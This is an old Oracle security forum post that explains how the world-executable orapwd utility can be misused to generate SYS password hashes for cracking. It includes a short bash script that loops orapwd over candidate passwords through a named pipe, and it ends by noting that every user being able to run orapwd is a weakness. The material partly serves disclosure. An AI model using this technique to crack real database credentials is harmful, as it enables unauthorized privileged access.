|
||
|
Title: orapwd to crack sys hash? Post by Pete Finnigan on Sep 20th, 2005, 1:51pm Hi, I've being playing with orapwd. Orapwd is 'world' executable on a standard Oracle installation. It allows to change/set the SYS password. The password is stored in $ORACLE_HOME/dbs/orapw<SID>. But any OS user can execute it and create his own password-file. If the password-file doesn't exists its created, if it exists you get an error: OPW-00005: File with same name exists. If you use the force=y option the password-file is recreated. How can you use orapwd to crack SYS's password? Well, if you happens to have the hash value of SYS's password (very unprobable I think) you could generate all posible hashes with orapwd (although probably not as fast as orabf; I did a test with 26 password, from A to Z, and it took 0.6 seconds): #!/bin/bash # Auteur: I.A. Saez Scheihing mknod pijp p while true; do cat < pijp >> output.txt; done & orapwd file=pijp password=a force=y orapwd file=pijp password=b force=y orapwd file=pijp password=c force=y orapwd file=pijp password=d force=y orapwd file=pijp password=e force=y orapwd file=pijp password=f force=y orapwd file=pijp password=g force=y orapwd file=pijp password=h force=y orapwd file=pijp password=j force=y orapwd file=pijp password=k force=y orapwd file=pijp password=l force=y orapwd file=pijp password=m force=y orapwd file=pijp password=n force=y orapwd file=pijp password=o force=y orapwd file=pijp password=p force=y ... ... .. rm pijp # end script So after 'password=' you could try all password combinations. After completion you would find all posible hashes in file output.txt! By the way: I don't think every one should be allowd to execute orapwd. This tool is meant for oracle only. kind regards, Ivan |
||
|
Powered by YaBB 1 Gold - SP 1.4! Forum software copyright © 2000-2004 Yet another Bulletin Board |